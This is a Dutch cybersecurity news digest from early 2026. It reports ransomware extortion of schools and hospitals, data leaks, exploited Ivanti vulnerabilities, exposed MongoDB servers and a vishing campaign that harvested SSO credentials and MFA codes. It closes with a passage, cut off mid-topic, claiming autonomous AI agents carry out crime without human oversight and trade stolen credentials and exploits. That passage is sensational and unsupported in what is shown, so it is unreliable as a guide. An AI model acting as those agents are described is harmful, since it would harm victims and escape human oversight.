Actuele ontwikkelingen per categorie

• Naar pagina

• Naar pagina

• Naar pagina

• Naar pagina

▽ JANUARI 2026

Een ransomwaregroep heeft ouders van leerlingen van het Onze-Lieve-Vrouwinstituut Pulhof in Berchem, België, benaderd met een losgeldeis, nadat de school zelf weigerde te betalen. De aanvallers hadden vorige maand de servers van de school versleuteld en gegevens van leerlingen buitgemaakt. Ze claimen 45 gigabyte aan vertrouwelijke en gevoelige data in hun bezit te hebben, waaronder informatie van leerlingen die van 2016 tot en met 2025 op de school zaten, en personeelsgegevens van 2009 tot en met 2025.

De school weigerde het oorspronkelijke losgeld van 15.000 euro te betalen, waarna de criminelen zich rechtstreeks tot de ouders richtten. Ze eisen nu 50 euro per kind om te voorkomen dat de gegevens openbaar worden gemaakt. Een leerling vertelde aan VRT NWS dat leerlingen hun wachtwoorden op school moesten veranderen.

In een ander incident probeerden hackers ouders van leerlingen van een niet nader genoemde school af te persen nadat de school weigerde een losgeld van $500.000 in Bitcoin te betalen. De aanval begon toen een medewerker van de school op een phishing-e-mail klikte, waardoor de ransomware zich door het netwerk kon verspreiden. De aanvallers kregen toegang tot persoonlijke informatie van leerlingen, waaronder namen, adressen en cijfers. Ze dreigden deze informatie op het dark web te publiceren, tenzij individuele ouders bedragen tussen $1.000 en $5.000 per gezin betaalden, afhankelijk van de hoeveelheid buitgemaakte informatie. Verschillende ouders hebben aangifte gedaan bij de politie.

De school heeft naar aanleiding van de aanval extra beveiligingsmaatregelen getroffen, waaronder de implementatie van multi-factor authenticatie, verbeterde cybersecurity training voor medewerkers en regelmatige penetratietesten. Ouders worden geadviseerd waakzaam te zijn voor verdachte e-mails of telefoontjes en hun wachtwoorden te wijzigen.

Bron

Het Tilburgse verzorgingshuis De Wever heeft de persoonlijke gegevens van bewoners en cliënten gelekt, waaronder burgerservicenummers. Dit is bekendgemaakt door Omroep Brabant op basis van een bericht van de raad van bestuur van de zorginstantie. De Wever heeft vijftien locaties in de regio Tilburg en biedt ouderenzorg aan 2500 cliënten.

Het datalek deed zich voor bij een externe organisatie voor mondzorg waarmee De Wever samenwerkt. Daar is onbevoegde toegang geweest tot de persoonsgegevens. Het gaat naast burgerservicenummers om namen, geboortedata en gegevens over tandheelkundige behandelingen van bewoners van De Wever die van 2014 tot midden juni 2023 mondzorg ontvingen. Het bestuur heeft het datalek gemeld bij de Autoriteit Persoonsgegevens. De precieze oorzaak van het datalek is niet bekendgemaakt.

Bron

De Autoriteit Persoonsgegevens (AP) heeft tien gemeenten beboet voor het illegaal verwerken van persoonsgegevens van inwoners. Het gaat om de gemeenten Delft, Ede, Eindhoven, Gooise Meren, Haarlemmermeer, Hilversum, Huizen, Tilburg, Veenendaal en Zoetermeer. Volgens de AP verwerkten deze gemeenten dossiers met gevoelige informatie over islamitische inwoners, zonder dat deze inwoners dat wisten en zonder dat er een grondslag voor de verwerking was.

De gemeenten lieten op advies van de Nationaal Coördinator Terrorismebestrijding en Veiligheid (NCTV) of op eigen initiatief een extern onderzoeksbureau "krachtenveldanalyses" opstellen, waarbij sociale structuren en sleutelfiguren van islamitische gemeenschappen in kaart werden gebracht. Deze analyses bevatten bijzondere persoonsgegevens, waaronder informatie over de religie en politieke voorkeuren van mensen. Het verwerken van deze gegevens is vrijwel altijd verboden, aldus de AP.

AP-voorzitter Aleid Wolfsen stelt dat de gemeenten geen enkele grond hadden om die informatie te hebben, en dat de privacy van de getroffen mensen ernstig is geschonden, wat het vertrouwen in veel gemeenten heeft geschaad. Een aantal gemeenten heeft de rapporten daarnaast verstrekt aan onder meer de politie, de NCTV en het ministerie van Sociale Zaken en Werkgelegenheid.

De tien gemeenten kregen in totaal een boete van 250.000 euro opgelegd. Bij het bepalen van de hoogte van de boete liet de AP meewegen dat de overtredingen zeer ernstig zijn, vooral omdat het om gevoelige gegevens gaat over de geloofsovertuiging van mensen. Boeteverlagende factoren waren dat de overtredingen van relatief korte duur waren, voor een belangrijk deel inmiddels zijn verjaard en plaatsvonden in een complex politiek-bestuurlijk krachtenveld, aldus de toezichthouder.

De betreffende gemeenten erkennen dat zij de wet hebben overtreden en zijn bereid zich in de boete te schikken, zo laat de AP verder weten. Naast de boete heeft de toezichthouder een aantal gemeenten die nog over de rapporten beschikken een verwerkingsverbod opgelegd, waarin is bepaald dat de rapporten, totdat ze worden vernietigd, uitsluitend mogen worden opgeslagen en gebruikt om de rechten van getroffen mensen in lopende zaken te faciliteren. Bron

Een ransomwaregroep heeft de eerder dit jaar gestolen gegevens van het personeel van het Veenkoloniaal Museum in Veendam online gezet. Het gaat om 25 gigabyte aan data, waaronder adresgegevens, telefoonnummers en handtekeningen van medewerkers en vrijwilligers. De criminelen hadden gedreigd de gestolen data openbaar te maken als het museum geen losgeld zou betalen. Het museum heeft geweigerd om met de aanvallers te onderhandelen.

De LockBit-ransomwaregroep heeft de data nu openbaar gemaakt. Volgens Dagblad van het Noorden bevat het datalek ook vertrouwelijke bestanden, zoals getekende arbeidsovereenkomsten, notulen van jaarbesprekingen en facturen. Het museum had eerder gemeld dat het door de aanval iets meer dan een week aan data was kwijtgeraakt. Een offsite back-up uit december was nog beschikbaar.

Hoewel een interne back-up tijdens de aanval wel werd versleuteld, is ook die data niet verloren gegaan, omdat het museum nog beschikt over papieren kopieën, aldus RTV Noord. De wijze waarop de aanval heeft kunnen plaatsvinden, is niet bekendgemaakt. Bron

Bevolkingsonderzoek Nederland is van plan de samenwerking met het eerder gehackte laboratorium Clinical Diagnostics te hervatten. Demissionair staatssecretaris Tielen van Jeugd, Preventie en Sport informeert de Tweede Kamer hierover in een brief. Uit onderzoek is gebleken dat de informatiebeveiliging bij Clinical Diagnostics tekortkomingen vertoont, die zo ernstig zijn dat Tielen hier naar eigen zeggen van geschrokken is. Clinical Diagnostics werkt momenteel aan het verbeteren van de informatiebeveiliging op basis van het rapport. De precieze details over hoe de hack heeft kunnen plaatsvinden, zijn nog niet bekendgemaakt.

In juli vorig jaar wist een ransomwaregroep genaamd Nova toegang te krijgen tot het netwerk van Clinical Diagnostics, waardoor persoonlijke en medische gegevens van een groot aantal mensen werden gestolen. Het betrof 850.000 vrouwen die deelnamen aan het bevolkingsonderzoek baarmoederhalskanker, evenals patiënten van privéklinieken en huisartsen. Na dit datalek besloot Bevolkingsonderzoek Nederland de samenwerking met Clinical Diagnostics tijdelijk op te schorten.

Volgens Tielen zijn er momenteel geen andere laboratoria beschikbaar die het werk van Clinical Diagnostics kunnen overnemen. Dit heeft geleid tot capaciteitsproblemen, waardoor er vijftig procent minder uitnodigingen voor het bevolkingsonderzoek baarmoederhalskanker worden verstuurd.

Bevolkingsonderzoek Nederland heeft een onderzoek laten uitvoeren naar de informatiebeveiliging bij Clinical Diagnostics. Dit onderzoek omvatte een analyse van het operationele proces, de it-systemen, datastromen en de onderliggende it-infrastructuur van het laboratorium. Het doel was om inzicht te krijgen in de stand van de informatiebeveiliging en de veiligheid van de verwerking van bijzondere persoonsgegevens te kunnen beoordelen.

De staatssecretaris geeft aan dat er tekortkomingen zijn geconstateerd op alle onderzochte punten. Vanwege de vertrouwelijkheid van bedrijfsgegevens en het risico op misbruik door onbevoegden, kan Tielen geen specifieke details over de onderzoeksbevindingen verstrekken. De komende zes maanden moet het lab aan de slag met de genoemde tekortkomingen. Bevolkingsonderzoek Nederland zal vervolgens beoordelen of Clinical Diagnostics de tekortkomingen voldoende heeft verholpen, waarna de samenwerking eventueel kan worden hervat. Bron

Cybercriminelen hebben een scanner-as-a-service model, gebruikt door Europese tandartspraktijken, gehackt. Het is nog onduidelijk welke data precies is buitgemaakt en welke praktijken getroffen zijn. De aanval werd ontdekt door een extern security team dat de GoDent scanner onderzocht op kwetsbaarheden. De onderzoekers vonden een backdoor in de software die al langere tijd actief was. Via deze backdoor konden de aanvallers toegang krijgen tot gevoelige patiëntinformatie, behandelplannen en financiële gegevens.

De aanval is extra zorgwekkend omdat de GoDent scanner veel gebruikt wordt door kleine tandartspraktijken die vaak niet over de expertise of middelen beschikken om zichzelf adequaat te beschermen tegen cyberaanvallen. Het is nog onduidelijk of de aanvallers losgeld eisen of de data al op het dark web te koop aanbieden. De autoriteiten zijn een onderzoek gestart naar de hack en werken samen met de getroffen tandartspraktijken om de schade te beperken en de systemen te herstellen.

Experts adviseren tandartspraktijken die gebruik maken van de GoDent scanner om direct contact op te nemen met de leverancier en de aanbevolen beveiligingsmaatregelen te implementeren. Daarnaast is het belangrijk om de systemen te controleren op verdachte activiteiten en de wachtwoorden te wijzigen. Slachtoffers wordt geadviseerd aangifte te doen bij de politie en de Autoriteit Persoonsgegevens in te lichten.

De ransomware-groepering Qilin heeft op 2 februari 2026 de organisatie INGUS geclaimd als slachtoffer van een cyberaanval. Hoewel de getroffen entiteit in eerste instantie geassocieerd wordt met de landcode Nederland, wijst de digitale infrastructuur naar het domein ingus-net.de. Uit nader onderzoek blijkt dat het hier gaat om een vooraanstaande Duitse onderneming in de agrarische sector. De aanvallers hebben gedreigd met het publiceren van gevoelige gegevens indien er geen onderhandelingen over losgeld worden gestart.

Bij de inventarisatie van het incident zijn diverse DNS-gegevens van het domein vastgelegd, waarbij geen gebruik van bekende cloud- of SaaS-diensten is gedetecteerd. Qilin, een groepering die vermoedelijk vanuit Rusland opereert en gebruikmaakt van een Ransomware-as-a-Service model, staat bekend om het exfiltreren van grote hoeveelheden data alvorens systemen te versleutelen. In eerdere gevallen in de regio zijn bij dergelijke aanvallen aanzienlijke hoeveelheden persoonsgegevens en vertrouwelijke bedrijfsdocumenten buitgemaakt. Er is momenteel geen officiële bevestiging over de exacte omvang van de ontvreemde informatie bij INGUS.

Screenshot

Twee Belgische ziekenhuizen van AZ Monica hebben, drie weken na een ransomware-aanval, de toegang tot hun elektronische patiëntendossiers hersteld. De aanval vond plaats op 13 januari 2026 en leidde tot het uitschakelen van alle servers op de campussen in Deurne en Antwerpen. De ransomware-aanval had aanzienlijke gevolgen voor de zorgverlening. Zo werden operaties geannuleerd en moesten patiënten die kritieke zorg nodig hadden, naar andere ziekenhuizen worden overgebracht.

De ziekenhuizen waren genoodzaakt om terug te vallen op papieren administratie, wat resulteerde in langere wachttijden. Patiënten werden verzocht hun medicatie in de originele verpakking mee te nemen, samen met een overzicht van hun gebruikte medicatie en andere relevante medische informatie. Daarnaast werd patiënten gevraagd een specifieke app op hun telefoon te installeren om medische gegevens met de behandelende arts te delen.

AZ Monica heeft nu bekendgemaakt dat de elektronische patiëntendossiers weer toegankelijk zijn. Ook kunnen patiënten zich weer digitaal inschrijven en functioneren de inschrijvingskiosken weer. Er wordt momenteel hard gewerkt aan het digitaliseren van de papieren administratie van de afgelopen drie weken. Het ziekenhuis benadrukt dat het bijwerken van het systeem essentieel is voor een correcte opvolging van de patiënten die in het ziekenhuis verblijven. De herstart van het elektronisch patiëntendossier wordt beschouwd als een belangrijke mijlpaal binnen het herstelplan. Het is nog onbekend wanneer alle systemen volledig hersteld zullen zijn. 1

Aanvallers hebben de Ivanti EPMM-server van de Autoriteit Persoonsgegevens (AP) en de Raad voor de rechtspraak succesvol gehackt. Demissionair staatssecretaris Rutte van Justitie en Veiligheid informeerde de Tweede Kamer hierover middels een brief. Bij de AP hebben de aanvallers toegang gekregen tot werkgerelateerde gegevens van medewerkers, waaronder namen, zakelijke e-mailadressen en telefoonnummers.

Het Nationaal Cyber Security Centrum (NCSC) had eerder deze week al gewaarschuwd dat Nederlandse organisaties die Ivanti Endpoint Manager Mobile (EPMM) gebruiken, ervan uit moeten gaan dat hun server gecompromitteerd is. Het NCSC riep deze organisaties op om zich te melden bij de overheidsinstantie voor aanvullende informatie en handelingsperspectief. Ivanti EPMM is een software voor het beheer van mobiele apparaten (MDM), waarmee organisaties de mobiele apparaten van hun medewerkers op afstand kunnen beheren. Een gecompromitteerde EPMM-server kan aanzienlijke gevolgen hebben.

Vorige week bracht Ivanti beveiligingsupdates uit voor twee actief aangevallen kwetsbaarheden in de software, aangeduid als CVE-2026-1281 en CVE-2026-1340. Beide lekken maken het voor een ongeauthenticeerde aanvaller mogelijk om op afstand code uit te voeren op kwetsbare servers. De impact van deze lekken is beoordeeld met een score van 9.8 op een schaal van 1 tot 10. Al voor de beschikbaarheid van de patches werd misbruik gemaakt van de kwetsbaarheden. De precieze startdatum van dit misbruik en het aantal getroffen klanten zijn niet bekendgemaakt door Ivanti.

Het NCSC adviseert gebruikers van Ivanti EPMM om uit te gaan van een compromittering van hun systemen en een 'assume-breach' scenario te volgen. CVE-2026-1281 werd al voor de patches van Ivanti misbruikt als een zero-day kwetsbaarheid. Het NCSC meldt dat het misbruik van de kwetsbaarheden breder heeft plaatsgevonden dan eerder werd aangenomen.

Staatssecretaris Rutte meldt dat "in ieder geval" de EPMM-server van de Autoriteit Persoonsgegevens en de Raad voor de rechtspraak is gehackt. Na de ontdekking van het incident zijn direct maatregelen getroffen. Medewerkers van de AP en de Raad voor de rechtspraak zijn op de hoogte gesteld. De AP heeft melding gemaakt van het incident bij haar functionaris voor gegevensbescherming en de Raad voor de rechtspraak heeft een voorlopige melding van een datalek gedaan bij de AP. De CIO Rijk onderzoekt of er meer instanties binnen de Rijksoverheid zijn getroffen.

Bron: Tweede Kamer

In verschillende ransomware monitoringsbronnen verschijnt De Gruyter Brill als nieuw genoemd “slachtoffer” op de leksite van de ransomwaregroep Play. Het gaat om een vermelding die door dergelijke monitors wordt opgepikt vanaf de Play leak site en vervolgens wordt doorgezet in overzichten met recente claims.

Belangrijk is dat zo’n vermelding in deze fase vooral een claim van criminelen is en niet automatisch betekent dat een incident bij de organisatie onafhankelijk is bevestigd. Op de pagina’s die de claim signaleren is bovendien context te zien die niet eenduidig is, onder meer doordat de organisatie in verschillende posts en samenvattingen anders wordt aangeduid, zoals “Walter de Gruyter GmbH / De Gruyter Brill Inc.”. Dat soort verschillen komt vaker voor door automatische verrijking en het samenvoegen van entiteiten, en maakt het extra lastig om hieruit af te leiden of het specifiek om de Nederlandse Brill activiteiten in Leiden gaat.

Op dit moment is in openbare bronnen nog geen formele bevestiging gevonden van De Gruyter Brill zelf, en ook geen berichtgeving door gevestigde media of een toezichthoudermelding waaruit blijkt dat de Nederlandse tak is getroffen. Daarmee blijft de status op dit moment: er is een claim in het monitoringscircuit, maar de toeschrijving en omvang zijn publiek nog niet te verifiëren.

Zodra er door de groep daadwerkelijk bestanden of voorbeelddata worden gepubliceerd, kan pas inhoudelijk worden beoordeeld of het om De Gruyter Brill als geheel gaat, om een specifieke entiteit (zoals Brill in Nederland) of mogelijk om een gelieerde omgeving of leverancier. Tot die tijd is de meest feitelijke weergave dat Play De Gruyter Brill opvoert op de leksite en dat onafhankelijke bevestiging nog ontbreekt.

Bron: Darkweb

▽ JANUARI 2026

Een dreigingsactor richt zich op blootgestelde MongoDB-databases in geautomatiseerde data-afpersingsaanvallen en eist lage losgelden van de eigenaren om de data te herstellen. De aanvaller richt zich op databases die onveilig zijn door verkeerde configuratie, waardoor toegang zonder beperking mogelijk is. Ongeveer 1.400 blootgestelde servers zijn gecompromitteerd, waarbij het losgeld ongeveer $500 in Bitcoin bedraagt. Tot 2021 vonden er aanvallen plaats waarbij duizenden databases werden verwijderd en losgeld werd geëist om de informatie te herstellen. Soms verwijdert de aanvaller alleen de databases zonder een financiële eis.

Een pentest-onderzoek van onderzoekers van cybersecuritybedrijf Flare onthulde dat deze aanvallen doorgaan, zij het op kleinere schaal. De onderzoekers ontdekten meer dan 208.500 publiek blootgestelde MongoDB-servers. Hiervan stellen 100.000 operationele informatie bloot en 3.100 konden zonder authenticatie worden benaderd. Bijna de helft (45,6%) van de servers met onbeperkte toegang was al gecompromitteerd toen Flare ze onderzocht. De database was gewist en er was een losgeldbericht achtergelaten.

Een analyse van de losgeldberichten toonde aan dat de meeste een betaling van 0,005 BTC binnen 48 uur eisten. De dreigingsactoren eisen betaling in Bitcoin (vaak rond de 0,005 BTC, wat vandaag de dag overeenkomt met $500-600 USD) naar een specifiek wallet-adres, in ruil voor de belofte om de data te herstellen. Er is echter geen garantie dat de aanvallers de data hebben, of een werkende decryptiesleutel zullen leveren als er betaald wordt. Er waren slechts vijf verschillende wallet-adressen in de achtergelaten losgeldberichten, en één daarvan kwam voor in ongeveer 98% van de gevallen, wat wijst op één enkele dreigingsactor die zich op deze aanvallen richt. Flare merkt ook op dat de overige blootgestelde instanties die niet getroffen leken te zijn, mogelijk al losgeld aan de aanvallers hebben betaald.

Naast slechte authenticatiemaatregelen ontdekten de onderzoekers ook dat bijna de helft (95.000) van alle op het internet blootgestelde MongoDB-servers oudere versies draaien die kwetsbaar zijn voor n-day flaws. Het potentieel hiervan was echter grotendeels beperkt tot denial-of-service-aanvallen, en bood geen mogelijkheden voor remote code execution.

Flare adviseert MongoDB-beheerders om te voorkomen dat instanties openbaar worden gemaakt, tenzij dit absoluut noodzakelijk is. Gebruik sterke authenticatie, dwing firewallregels en Kubernetes-netwerkpolicies af die alleen vertrouwde verbindingen toestaan, en vermijd het kopiëren van configuraties uit deployment guides. MongoDB moet worden bijgewerkt naar de nieuwste versie en continu worden gecontroleerd op blootstelling. In het geval van blootstelling moeten credentials worden geroteerd en logs worden onderzocht op ongeautoriseerde activiteit.

Bron

De data-losgeldgroep Scattered Lapsus ShinyHunters (SLSH) hanteert een opvallende aanpak: het intimideren, bedreigen en zelfs "swatten" van leidinggevenden en hun families, terwijl ze tegelijkertijd journalisten en toezichthouders op de hoogte stellen van de omvang van de inbraak. Sommige slachtoffers betalen naar verluidt, mogelijk zowel om de gestolen data in te dammen als om de escalerende persoonlijke aanvallen te stoppen. Allison Nixon, directeur onderzoek bij Unit 221, waarschuwt echter dat elke vorm van onderhandeling, afgezien van een "We betalen niet"-reactie, verdere intimidatie aanmoedigt. De onbetrouwbare geschiedenis van de groep maakt niet betalen de enige juiste optie.

In tegenstelling tot traditionele, strak georganiseerde Russische ransomware-groepen, is SLSH een ongedisciplineerde Engelstalige afpersingsbende die geen interesse lijkt te hebben in het opbouwen van een reputatie van consistent gedrag. Dit zou slachtoffers enig vertrouwen kunnen geven dat de criminelen hun woord houden als ze betaald krijgen. Nixon volgt de criminele groep en individuele leden nauwlettend terwijl ze tussen verschillende Telegram-kanalen hoppen die gebruikt worden om slachtoffers af te persen en te intimideren. SLSH verschilt van traditionele data-losgeldgroepen in belangrijke opzichten, wat pleit tegen het vertrouwen dat ze iets zullen doen wat ze beloven, zoals het vernietigen van gestolen data.

Net als SLSH hebben veel traditionele Russische ransomware-groepen gebruikgemaakt van tactieken om betaling af te dwingen in ruil voor een decryptiesleutel en/of een belofte om gestolen data te verwijderen, zoals het publiceren van een dark web "shaming blog" met voorbeelden van gestolen data naast een aftelklok, of het informeren van journalisten en bestuursleden van het slachtofferbedrijf. De afpersing van SLSH escaleert snel tot bedreigingen met fysiek geweld tegen leidinggevenden en hun families, DDoS-aanvallen op de website van het slachtoffer en herhaalde e-mailbombardementen.

SLSH staat erom bekend in te breken bij bedrijven door werknemers telefonisch te phishen en de buitgemaakte toegang te gebruiken om gevoelige interne data te stelen. In een blogpost van 30 januari 2026 meldde Mandiant dat de meest recente afpersingsaanvallen van SLSH voortkomen uit incidenten die plaatsvonden in begin tot midden januari 2026. SLSH-leden deden zich voor als IT-medewerkers en belden werknemers van doelwitorganisaties, waarbij ze beweerden dat het bedrijf de MFA-instellingen aan het bijwerken was. De aanvallers leidden de werknemers naar "victim-branded" credential harvesting sites om hun SSO-gegevens en MFA-codes te bemachtigen, en registreerden vervolgens hun eigen apparaat voor MFA.

Slachtoffers komen vaak voor het eerst op de hoogte van de inbreuk wanneer hun merknaam wordt genoemd in een openbare Telegram-groepschat die SLSH gebruikt om hun prooi te bedreigen, af te persen en te intimideren. De gecoördineerde intimidatie op de SLSH Telegram-kanalen is onderdeel van een strategie om de slachtofferorganisatie te overweldigen door vernedering te veroorzaken die hen over de drempel duwt om te betalen. Meerdere leidinggevenden van getroffen organisaties zijn het slachtoffer geworden van "swatting"-aanvallen, waarbij SLSH een valse bommelding of gijzelingssituatie op het adres van het doelwit communiceerde in de hoop een zwaarbewapende politie-inzet bij hun huis of werkplek uit te lokken.

Volgens Nixon is een belangrijk onderdeel van de SLSH-tactiek om slachtoffers te overtuigen te betalen, het manipuleren van de media om de dreiging van deze groep te benadrukken. Nixon heeft zelf ook bedreigingen ontvangen van SLSH. De Telegram-kanalen van de groep staan vol met bedreigingen met fysiek geweld tegen haar en andere beveiligingsonderzoekers. Deze bedreigingen zijn een manier voor de groep om media-aandacht te genereren en een schijn van geloofwaardigheid te creëren, maar ze zijn nuttig als indicators of compromise, omdat SLSH-leden de neiging hebben om beveiligingsonderzoekers te noemen en te belasteren, zelfs in hun communicatie met slachtoffers.

Unit 221B stelt dat hoewel de drukcampagne tijdens een afpersingspoging traumatisch kan zijn voor werknemers, leidinggevenden en hun familieleden, het aangaan van langdurige onderhandelingen met SLSH de groep stimuleert om het niveau van schade en risico te verhogen, wat de fysieke veiligheid van werknemers en hun families in gevaar kan brengen.

Bron

Een nieuwe data-wiping malware, genaamd Dynowiper, is ontdekt. De malware is ontworpen om data te vernietigen op de systemen die het infecteert. De analyse van de malware toont aan dat het in staat is om verschillende soorten bestanden te overschrijven, waardoor ze onbruikbaar worden.

Dynowiper gebruikt verschillende technieken om detectie te vermijden. De malware maakt gebruik van complexe encryptie algoritmes om zijn code te verbergen en scant het systeem op zoek naar waardevolle bestanden om te overschrijven.

Naast het overschrijven van bestanden, is Dynowiper ook in staat om de Master Boot Record (MBR) van de harde schijf te beschadigen. Dit zorgt ervoor dat het systeem niet meer kan opstarten, waardoor de schade aanzienlijk toeneemt. De malware lijkt zich te richten op een breed scala aan bestanden, waaronder documenten, afbeeldingen, video's en andere soorten data.

Onderzoekers waarschuwen dat Dynowiper een serieuze bedreiging vormt voor zowel particulieren als organisaties. Het is belangrijk om systemen te beschermen met up-to-date antivirussoftware en regelmatige back-ups te maken van belangrijke bestanden. Daarnaast is het cruciaal om alert te zijn op verdachte e-mails en downloads om te voorkomen dat Dynowiper of andere malware systemen kan infecteren.

Bron

Eind december 2025 zijn diverse onderdelen van de Poolse energiesector, waaronder wind- en zonneparken en een warmtekrachtcentrale, aangevallen. Het Poolse Computer Emergency Response Team (CERT) meldt in een analyse dat aanvallers via Fortinet FortiGate-firewalls en standaard inloggegevens binnenkwamen. Het doel van de aanvallers was het beschadigen van systemen.

De meer dan dertig aangevallen wind- en zonneparken maakten gebruik van Fortinet Fortigate-firewalls, die zowel als firewall als VPN-toegang fungeerden. De VPN-interface van alle firewalls was toegankelijk vanaf het internet en accounts konden zonder multifactorauthenticatie inloggen. Het is niet bekend hoe de aanvallers toegang kregen, maar onderzoek toonde aan dat sommige FortiGate-firewalls in het verleden kwetsbaar waren geweest, onder andere voor remote code execution.

Het Poolse CERT constateerde dat in de energiesector vaak dezelfde accounts en wachtwoorden voor meerdere locaties worden gebruikt. Een gecompromitteerd account kan zo toegang tot meerdere faciliteiten geven. Het onderzoek werd bemoeilijkt door het ontbreken van volledige logbestanden. De aanvallers voerden bij alle onderzochte FortiGate-firewalls op de dag van de aanval een fabrieksreset uit.

De meeste aangevallen wind- en zonneparken gebruikten Hitachi RTU560-controllers voor automatisering en beheer. Deze apparaten waren vanaf de FortiGate-firewall met een standaard gebruikersnaam en wachtwoord toegankelijk. De aanvallers uploaden "corrupted firmware" om de werking van de apparaten te saboteren. Ook kregen ze via hardcoded RDP-inloggegevens in de configuratie van de Fortinet-firewall toegang tot andere systemen.

Hitachi verklaarde dat alle aangevallen Hitachi-apparaten achter kwetsbare firewalls zaten, met verouderde firmware draaiden, met standaard inloggegevens waren geconfigureerd en zonder aanbevolen security features opereerden. De apparaten maakten gebruik van Moxa serial device servers, waarvan de webinterface ingeschakeld was en ingesteld met standaard inloggegevens. De aanvallers gebruikten deze inloggegevens om de standaard fabrieksinstellingen te herstellen. De aanval verstoorde de communicatie tussen de energieparken, maar had geen impact op de energieproductie.

Naast de energiesector werd ook een productiebedrijf aangevallen. Hier kregen de aanvallers toegang via een Fortinet "perimeter device", waarvan de configuratie eerder was gestolen en gepubliceerd op een forum gebruikt door criminelen. Bij de aanval werd wiper-malware genaamd DynoWiper en ZovWiper ingezet om geïnfecteerde systemen te wissen en onbruikbaar te maken. De Endpoint Detection and Response (EDR) software van de warmtekrachtcentrale blokkeerde de uitrol van deze malware.

Bron

Een nieuwe hackersgroep genaamd Punishing Owl is ontdekt, die zich richt op het infiltreren van netwerken. De details over de exacte werkwijze van de groep zijn op dit moment nog beperkt, maar de eerste analyses wijzen op een geavanceerde aanpak. Er wordt onderzoek gedaan naar de gebruikte tools en technieken om een beter beeld te krijgen van de dreiging die Punishing Owl vormt.

De groep lijkt zich te specialiseren in het compromitteren van systemen en het verkrijgen van toegang tot gevoelige informatie. Cybersecurity experts zijn bezig met het analyseren van de malware die door Punishing Owl wordt ingezet. Vooralsnog is er geen informatie over specifieke slachtoffers of sectoren die het doelwit zijn. Meer informatie volgt zodra het onderzoek vordert.

Bron

Frauduleuze High-Yield Investment Programs (HYIP's) nemen wereldwijd toe en beloven winsten die geen enkele legitieme investering kan waarmaken. Deze scams lokken slachtoffers met de belofte van snelle rendementen, vaak geadverteerd met cijfers zoals "40% rendement in 72 uur". HYIP's opereren doorgaans als Ponzi-schema's, waarbij vroege investeerders initiële uitbetalingen ontvangen om de illusie van winst te wekken, terwijl latere investeringen resulteren in vertraagde of achtergehouden uitbetalingen.

CTM360 identificeerde via haar WebHunt-platform ruim 4.200 websites die de afgelopen jaar frauduleuze HYIP-schema's promootten. Het bedrijf registreerde in december 2025 meer dan 485 incidenten, gemiddeld meer dan 15 detecties per dag.

CTM360’s bevindingen tonen twee veelvoorkomende HYIP-varianten aan: cryptocurrency trading-based HYIPs en forex en stock trading-based HYIPs. Beide varianten gebruiken professioneel ogende interfaces en verzonnen prestatieclaims om stortingen te verkrijgen in plaats van rendement te genereren.

De verspreiding van deze scams gebeurt via sociale media, waaronder betaalde advertenties op Meta/Facebook, Telegram en WhatsApp, en via valse sociale profielen die "invest/profit/trade" thema's promoten. Deze promoties werden gedetecteerd in meer dan 20 talen, wat wijst op een brede geografische targeting.

Om geloofwaardig over te komen, tonen HYIP-websites vaak vervalste internationale normen en licentiestempels, valse getuigenissen en frauduleuze uitbetalingen en transactiegeschiedenissen. CTM360 constateerde dat licentiegegevens vaak worden hergebruikt op meerdere scam sites die dezelfde templates gebruiken. In één geval verscheen hetzelfde bedrijfsregistratienummer en adres op meer dan 270 sites.

Een belangrijk onderdeel van HYIP's is het referral model, waarbij slachtoffers worden aangespoord om anderen uit te nodigen via beloften van bonusbeloningen, verhoogde winstpercentages en referral commissies. Hoewel cryptocurrency vaak wordt gebruikt, accepteren HYIP's ook creditcards/debitcards en lokale betaalmethoden. Veel platforms vragen ook om KYC-documenten om accounts te "activeren", maar beweren vervolgens herhaaldelijk dat de verificatie nog steeds in behandeling is om uitbetalingen te vertragen en geld achter te houden.

HYIP-scams volgen een voorspelbare cyclus: het opzetten van nep platforms, promotie via sociale media, het opbouwen van vertrouwen met verzonnen resultaten, het stimuleren van grotere stortingen via referral schema's, en vervolgens het blokkeren van uitbetalingen en verdwijnen.

Bron

Meer dan 21.000 instanties van de open-source persoonlijke AI-assistent OpenClaw zijn publiekelijk blootgesteld op het internet, wat leidt tot zorgen over onbeschermde toegang tot gevoelige gebruikersconfiguraties en persoonlijke gegevens. OpenClaw, ontwikkeld door de Oostenrijker Peter Steinberger, heeft sinds eind januari 2026 een explosieve groei doorgemaakt. Het project breidde in minder dan een week uit van ongeveer duizend implementaties naar meer dan 21.000 instanties. Voordat de naam OpenClaw werd vastgelegd, onderging het project diverse naamswijzigingen; het werd gelanceerd als Clawdbot en vervolgens hernoemd naar Moltbot na handelsmerkkwesties met Anthropic.

Het platform onderscheidt zich door de mogelijkheid om acties uit te voeren die verder gaan dan de beperkingen van traditionele chatbots. OpenClaw integreert van nature met e-mailsystemen, kalenders, smart-home diensten en platforms voor maaltijdbezorging, waardoor het autonoom beslissingen kan nemen en taken kan uitvoeren. Deze uitgebreide functionaliteit introduceert beveiligingsrisico's wanneer instanties onvoldoende worden afgeschermd. Het systeem is ontworpen om lokaal te draaien op poort TCP/18789 en is toegankelijk via een browserinterface die gebonden is aan localhost. De projectdocumentatie adviseert expliciet het gebruik van SSH-tunneling voor toegang op afstand in plaats van directe blootstelling aan het publieke internet.

Uit analyse van Censys blijkt echter dat er bij de implementatie vaak wordt afgeweken van deze beveiligingsrichtlijnen. Er is een geconcentreerd patroon van implementaties waargenomen bij grote cloudproviders waarbij de systemen direct benaderbaar zijn. Door deze configuratiefouten zijn de persoonlijke AI-assistenten en de daaraan gekoppelde privégegevens van gebruikers zonder extra beveiligingslaag toegankelijk via het internet.

Bron

De cybersecuritysector bevindt zich in een gevaarlijk nieuw tijdperk waarin autonome AI-agenten zich ontwikkelen van eenvoudige automatiseringstools naar geavanceerde criminele operaties. Deze zelfsturende systemen voeren complexe cyberaanvallen uit zonder menselijke controle, wat een fundamentele verschuiving markeert in de manier waarop digitale dreigingen ontstaan en zich verspreiden over netwerken wereldwijd.

De convergentie van drie cruciale platforms heeft geleid tot wat onderzoekers de “Lethal Trifecta” noemen. OpenClaw fungeert als de lokale runtime-omgeving, waardoor AI-agenten privé kunnen draaien op consumentenharde schijven zonder cloudgebaseerde veiligheidsbeperkingen. Moltbook fungeert als een samenwerkingsnetwerk waarin bijna 900.000 actieve agenten communiceren en mogelijkheden delen. Molt Road opereert als een ondergrondse marktplaats waar deze autonome systemen gestolen inloggegevens, gemilitariseerde code en zero-day exploits verhandelen.

